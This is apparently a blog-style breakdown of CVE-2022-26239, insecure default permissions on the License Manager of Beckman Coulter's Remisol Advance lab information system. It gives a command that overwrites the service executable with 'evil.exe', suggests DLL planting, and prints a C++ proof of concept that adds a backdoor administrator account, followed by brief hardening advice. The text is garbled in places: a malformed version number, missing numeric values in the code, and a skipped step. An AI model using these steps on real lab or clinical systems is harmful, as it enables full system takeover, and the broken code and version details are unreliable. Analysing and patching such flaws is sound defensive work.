In this long read, we dissect CVE-2022-26239 and see how surprisingly simple default permissions in Beckman Coulter’s Remisol Advance’s License Manager open the door for attackers. If you’re running or managing this lab information system (LIS), you’ll want to pay close attention.
What’s the Issue? (Plain English)
Beckman Coulter’s Remisol Advance, up to version 2..12.1, runs a service called “Normand License Manager.” By default, the files and folders for this service don’t have tight security: any regular (unprivileged) user on the system can alter, replace, or delete key program files.
That means if an attacker (or even just a regular user) can log in, they can overwrite files that the License Manager runs as SYSTEM. When the service restarts, Windows will run the attacker’s code with full privileges.
What’s CVE-2022-26239 Exactly?
This CVE was published to describe the insecure default filesystem permissions for the License Manager’s files.
Vulnerability Type: Incorrect Permissions, Privilege Escalation
- Official Advisory: NVD - CVE-2022-26239
How Do the Permissions Look?
By default, these files are owned (and modifiable) by “Everyone” or “Authenticated Users.” On Windows systems, this means almost anyone with a legitimate login can replace these files.
You can check file and folder permissions with
Get-Acl "C:\Program Files\Beckman_Coulter\RemisolAdvance\NormandLicenseManager"
Typical (vulnerable) output
Path : C:\Program Files\Beckman_Coulter\RemisolAdvance\NormandLicenseManager
Owner : BUILTIN\Administrators
Access : Everyone Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadAndExecute, Synchronize
...
See that “Everyone Allow FullControl”? That’s the problem.
1. Get a Local User Account
You need to log onto the system as any non-admin user. For most attackers, this means phishing or exploiting some other flaw to get a basic shell. For insiders, they already have access.
Look for the main Normand License Manager service EXE — for example
C:\Program Files\Beckman_Coulter\RemisolAdvance\NormandLicenseManager\licensemgr.exe
As a normal user, create a copy of your malicious EXE, maybe by doing
copy evil.exe "C:\Program Files\Beckman_Coulter\RemisolAdvance\NormandLicenseManager\licensemgr.exe"
Or, better yet, if there’s a DLL importing mechanism, drop a DLL with the same name as an imported library.
3. Wait for a Restart
The next time the system reboots, or someone restarts the License Manager service, your malicious file gets run as SYSTEM — giving you ultimate control.
Here’s a proof-of-concept “evil” EXE in C++ that just creates a new administrator account
#include <windows.h>
#include <lm.h>
#pragma comment(lib, "netapi32.lib")
int main() {
USER_INFO_1 ui;
DWORD dwLevel = 1;
DWORD dwError = ;
ui.usri1_name = (LPWSTR)L"hackedadmin";
ui.usri1_password = (LPWSTR)L"Password123!";
ui.usri1_priv = USER_PRIV_ADMIN;
ui.usri1_home_dir = NULL;
ui.usri1_comment = (LPWSTR)L"Added by exploit";
ui.usri1_flags = UF_SCRIPT;
ui.usri1_script_path = NULL;
NetUserAdd(NULL, dwLevel, (LPBYTE)&ui, &dwError);
return ;
}
Audit service binaries regularly for unauthorized changes.
- Update to patches from Beckman Coulter as they become available. Contact support here.
Example PowerShell to lock down the folder
icacls "C:\Program Files\Beckman_Coulter\RemisolAdvance\NormandLicenseManager" /inheritance:r
icacls "C:\Program Files\Beckman_Coulter\RemisolAdvance\NormandLicenseManager" /grant "Administrators:F" "SYSTEM:F"
References
- NVD CVE-2022-26239
- Beckman Coulter Remisol Advance product page
- Exploit DB reference (if/when public)
- Windows privilege escalation via weak service permissions (hackingarticles)
Summary
CVE-2022-26239 reveals just how dangerous default permissions can be, especially in specialized software like laboratory information systems. Always audit installation directories for security, restrict access, and keep your software up to date!
Timeline
Published on: 10/06/2022 18:15:00 UTC
Last modified on: 10/10/2022 03:00:00 UTC